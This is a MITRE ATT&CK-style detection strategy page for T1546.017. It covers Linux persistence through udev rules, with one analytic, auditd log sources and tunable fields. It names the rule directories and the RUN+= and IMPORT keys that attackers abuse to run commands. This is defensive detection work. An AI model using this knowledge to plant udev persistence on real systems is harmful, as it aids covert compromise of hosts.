Skip to content

DET0375 Detection Strategy for T1546.017 - Udev Rules (Linux)

Item Value
ID DET0375
Version 1.0
Created 21 October 2025
Last Modified 21 October 2025

Technique Detected: T1546.017 (Udev Rules)

Analytics

Linux

AN1056

Monitor for creation or modification of udev rules files in key directories (/etc/udev/rules.d/, /lib/udev/rules.d/, /usr/lib/udev/rules.d/). Look for RUN+= or IMPORT keys invoking suspicious binaries or scripts. Correlate this with process execution from systemd-udevd context, and file writes near udev reload/restart events. Combine this with unexpected background process spawning from udevd-related forks.

Log Sources
Data Component Name Channel
File Modification (DC0061) auditd:SYSCALL chmod, write, create, open
Process Creation (DC0032) auditd:SYSCALL execve
Command Execution (DC0064) auditd:CONFIG_CHANGE udev rule reload or trigger command executed
Mutable Elements
Field Description
UdevRulePath Path to udev rules (may vary by distro or user configuration)
SuspiciousRunPattern Regex or string pattern to flag suspicious command executions in RUN+=
TimeWindow Max interval between rule change and execution to correlate activity
ParentProcess Expected parent of RUN-invoked commands (e.g., systemd-udevd)